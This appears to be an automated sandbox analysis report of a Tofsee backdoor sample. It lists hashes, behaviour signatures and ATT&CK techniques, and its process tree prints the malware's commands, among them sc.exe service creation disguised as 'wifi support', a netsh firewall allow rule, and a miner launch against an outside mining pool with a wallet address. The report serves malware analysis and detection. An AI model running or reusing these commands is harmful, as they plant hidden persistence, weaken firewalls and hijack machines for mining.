Analysis

  • max time kernel
    151s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    14-11-2020 18:19

General

  • Target

    191f0b19b5e11dac84a8366d5aa12bf589e3952ee387d78da37b597e509cf76d.exe

  • Size

    14.3MB

  • MD5

    3b94b0d0ed530d4399f2a01f3a2f663c

  • SHA1

    81caa4687ce7c88c6ae729c7e0cc97be63d13ed9

  • SHA256

    191f0b19b5e11dac84a8366d5aa12bf589e3952ee387d78da37b597e509cf76d

  • SHA512

    cd40da59b612db3a34aff0995f90974f3d6e541734a8099a5774ecfe89786a7cd782ef2b1126aa9a5e8192e490ab46dbeb45d8bdb616c47f31ca7b7ff0c72f60

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 6 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\191f0b19b5e11dac84a8366d5aa12bf589e3952ee387d78da37b597e509cf76d.exe
    "C:\Users\Admin\AppData\Local\Temp\191f0b19b5e11dac84a8366d5aa12bf589e3952ee387d78da37b597e509cf76d.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:288
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qzwtteuk\
      2⤵
        PID:2004
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\jatwdqcb.exe" C:\Windows\SysWOW64\qzwtteuk\
        2⤵
          PID:2024
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create qzwtteuk binPath= "C:\Windows\SysWOW64\qzwtteuk\jatwdqcb.exe /d\"C:\Users\Admin\AppData\Local\Temp\191f0b19b5e11dac84a8366d5aa12bf589e3952ee387d78da37b597e509cf76d.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1200
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description qzwtteuk "wifi internet conection"
            2⤵
              PID:1648
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start qzwtteuk
              2⤵
                PID:1244
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                • Modifies service
                PID:1604
            • C:\Windows\SysWOW64\qzwtteuk\jatwdqcb.exe
              C:\Windows\SysWOW64\qzwtteuk\jatwdqcb.exe /d"C:\Users\Admin\AppData\Local\Temp\191f0b19b5e11dac84a8366d5aa12bf589e3952ee387d78da37b597e509cf76d.exe"
              1⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:1368
              • C:\Windows\SysWOW64\svchost.exe
                svchost.exe
                2⤵
                • Deletes itself
                • Drops file in System32 directory
                • Modifies service
                • Suspicious use of SetThreadContext
                • Modifies data under HKEY_USERS
                • Suspicious use of WriteProcessMemory
                PID:788
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe -o msr.pool.gntl.co.uk:40005 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+60000 -p x -k
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1148

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Persistence

            New Service

            1
            T1050

            Modify Existing Service

            2
            T1031

            Registry Run Keys / Startup Folder

            1
            T1060

            Privilege Escalation

            New Service

            1
            T1050

            Defense Evasion

            Disabling Security Tools

            1
            T1089

            Modify Registry

            3
            T1112

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\jatwdqcb.exe
              MD5

              5ffafb4d6999220f733e67933fb987f7

              SHA1

              2d5d27b4662b6ac88ca7d824ab4254405b99132f

              SHA256

              c7b0b9930a29b7a991a64e62f5bb9e087ae21064f5b0059e2f1e07751ee4bc2c

              SHA512

              75f8042d33a23f4bc5ce8f9f9fb41c7b18fdec420a9cce2a1461e6f636cf022181d7f0b10da2e9695d40ac065493d9d4f241684b841911b7a5a8b38a383571d7

            • C:\Windows\SysWOW64\qzwtteuk\jatwdqcb.exe
              MD5

              5ffafb4d6999220f733e67933fb987f7

              SHA1

              2d5d27b4662b6ac88ca7d824ab4254405b99132f

              SHA256

              c7b0b9930a29b7a991a64e62f5bb9e087ae21064f5b0059e2f1e07751ee4bc2c

              SHA512

              75f8042d33a23f4bc5ce8f9f9fb41c7b18fdec420a9cce2a1461e6f636cf022181d7f0b10da2e9695d40ac065493d9d4f241684b841911b7a5a8b38a383571d7

            • memory/788-13-0x0000000000180000-0x0000000000190000-memory.dmp
              Filesize

              64KB

            • memory/788-16-0x00000000001F0000-0x00000000001F7000-memory.dmp
              Filesize

              28KB

            • memory/788-15-0x00000000059F0000-0x0000000005DFB000-memory.dmp
              Filesize

              4.0MB

            • memory/788-14-0x0000000000190000-0x0000000000195000-memory.dmp
              Filesize

              20KB

            • memory/788-12-0x00000000000A0000-0x00000000000A6000-memory.dmp
              Filesize

              24KB

            • memory/788-11-0x0000000001D40000-0x0000000001F4F000-memory.dmp
              Filesize

              2.1MB

            • memory/788-9-0x0000000000089A6B-mapping.dmp
            • memory/788-8-0x0000000000080000-0x0000000000095000-memory.dmp
              Filesize

              84KB

            • memory/1148-17-0x0000000000210000-0x0000000000301000-memory.dmp
              Filesize

              964KB

            • memory/1148-18-0x0000000000210000-0x0000000000301000-memory.dmp
              Filesize

              964KB

            • memory/1148-20-0x00000000002A259C-mapping.dmp
            • memory/1200-3-0x0000000000000000-mapping.dmp
            • memory/1244-5-0x0000000000000000-mapping.dmp
            • memory/1604-6-0x0000000000000000-mapping.dmp
            • memory/1648-4-0x0000000000000000-mapping.dmp
            • memory/2004-0-0x0000000000000000-mapping.dmp
            • memory/2024-1-0x0000000000000000-mapping.dmp